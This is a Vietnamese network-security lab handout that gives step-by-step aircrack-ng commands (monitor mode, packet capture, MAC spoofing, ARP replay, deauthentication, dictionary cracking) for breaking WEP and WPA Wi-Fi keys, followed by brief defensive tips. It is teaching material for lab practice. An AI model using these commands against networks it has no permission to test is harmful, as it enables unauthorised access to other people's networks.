Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 1 LAB TẤN CÔNG VÀ PHÒNG THỦ WIRELESS LAN Access Point Wireless Client Wireless Client Router ADSL Hacker Hình 1.1 Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP Chuẩn bị: Các máy kết nối với nhau theo mô hình Một máy có Wireless Card hỗ trợ Hack Wep (Bài Lab này chúng tôi sử dụng máy có wireless Card với chip Atheros) Công cụ Hack: sử dụng Back|Track 4 Final Các bước thực hiện:  Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Hình 1.2  Bước 2: Sử dụng giao diện đồ họa trong Back Track Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 2 Từ dấu nhắc gõ lệnh startx Hình 1.3  Bước 3: Chuyển card mạng sang chế độ monitor Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig Hình 1.4 Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 (wlan0 là tên card mạng, có thể card mạng tên khác như ath0) Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 3 Hình 1.5  Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh Gõ lệnh airodump-ng wlan0 Hình 1.6  Bước 5: Chọn AP cần tấn công Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wep wlan0 Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 4 Hình 1.7  Bước 6: Hacker giả MAC Address (Wireless Client) chứng thực với AP Mở terminal thứ 3 và gõ lệnh: Aireplay-ng -1 20 –a 00:1B:11:58:7B:A9 –h 11:12:13:14:15:16 wlan0 Hình 1.8  Bước 7: Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thp gói tin nhanh hơn để giải mã tìm KEY Mở terminal thứ 4 và gõ lệnh: Aireplay-ng -3 –b 00:1B:11:58:7B:A9 –h 11:12:13:14:15:16 wlan0 Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 5 Hình 1.9  Bước 8: Xem traffic đã thu thp được bao nhiêu (nếu WEP 64bit có thể thu thp khoảng 10000  40000, còn nếu WEP 128bit thì thu thp lên đến khoảng 110000 để giải mã) chúng ta trở lại màn hình ở Bước 4 và 5 để xem ở cột Data Hình 1.10  Bước 9: Tìm KEY Mở terminal thứ 5 và gõ lệnh: Aircrack-ng web-01.cap Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 6 Hình 1.11 Hình 1.12 Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 7 Tấn công mạng Wireless LAN sử dụng bảo mật dạng WAP Các bước thực hiện:  Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Xem hình 1.2  Bước 2: Sử dụng giao diện đồ họa trong Back Track Từ dấu nhắc gõ lệnh startx Xem hình 1.3  Bước 3: Chuyển card mạng sang chế độ monitor Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig wlan0 (wlan0 là tên card mạng, có thể card mạng tên khác như ath0) Xem hình 1.4 Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 Xem hình 1.5  Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh Gõ lệnh airodump-ng wlan0 Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 8 Hình 1.13  Bước 5: Chọn AP cần tấn công Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wpa wlan0 Hình 1.14 Hình 1.15 Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 9  Bước 6: Thiết lp 4 bước bắt tay với AP cần tấn công Gõ lệnh: aireplay-ng -0 1 –b 00:1B:11:58:7B:A9 –c 00:1A:73:D9:9A:46 wlan0 Hình 1.16  Bước 7: Trở về bước 5 xem đã bắt tay được với AP chưa? Hình 1.17  Bước 8: Tiến hành dò tìm KEY từ bộ từ điển (Dictionary) để bruteforce. Bạn có thể dùng công cụ (PWDMAKER) tạo ra bộ từ điển hay bạn tạo một file và add vài Key để test (ví dụ bộ từ điển của bạn là pass.txt) Gõ lệnh: aircrack-ng –w pass.txt wpa-01.cap Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 10 Hình 1.18 Hình 1.19 LINK DANH SÁCH CARD WIRELESS HỖ TRỢ HACK WIRELESS THAM KHẢO http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#Dlink_DWA-645 [...].. .Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn BẢO MẬT WLAN Một hệ thống mạng không bao giờ là an toàn tuyệt đối bởi vì nhiều yếu tố khác nhau tác động đến hệ thống mạng Sau đây là một số biện pháp mà tôi đưa ra để các bạn có thể bảo vệ cho hệ thống mạng WLAN của bạn được an toàn hơn 1 Bảo mật WLAN bằng IP Address: chúng ta có thể không cho AP cấp địa chỉ IP động (Disable DHCP) cho các Wireless. .. DHCP) cho các Wireless Client hay dùng kỹ thuật phân chia mạng con (Supnetting) để cấp số lượng địa chỉ IP phù hợp với số lượng Wireless Client đang hoạt động trong hệ thống mạng 2 Ẩn SSID (Disable SSID Broadcast) 3 Lọc MAC Address: sử dụng tính năng lọc MAC Address của AP để cấm hay cho phép một số Wireless Client gia nhập vào hệ thống mạng 4 Sử dụng WPA với KEY phức tạp (bao gồm chữ hoa, chữ thường,... dụng WPA với KEY phức tạp (bao gồm chữ hoa, chữ thường, số và ký tự đặc biệt) và cố độ dài khoảng 10 ký tự trở lên 5 Cao cấp hơn là bạn có thể sử dụng chứng thực bằng RADIUS Nhưng chứng thực bằng RADIUS thì đòi hỏi bạn cần phải có kiến thức chuyên sâu về quản trị mạng THE END DangNS iSPACE Lecturer – Network Security Group Trang 11 . WIRELESS LAN Access Point Wireless Client Wireless Client Router ADSL Hacker Hình 1.1 Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP Chuẩn bị: Các. Và Bảo Mt Mạng Wireless LAN ispace.edu.vn DangNS iSPACE Lecturer – Network Security Group Trang 7 Tấn công mạng Wireless LAN sử dụng bảo mật dạng WAP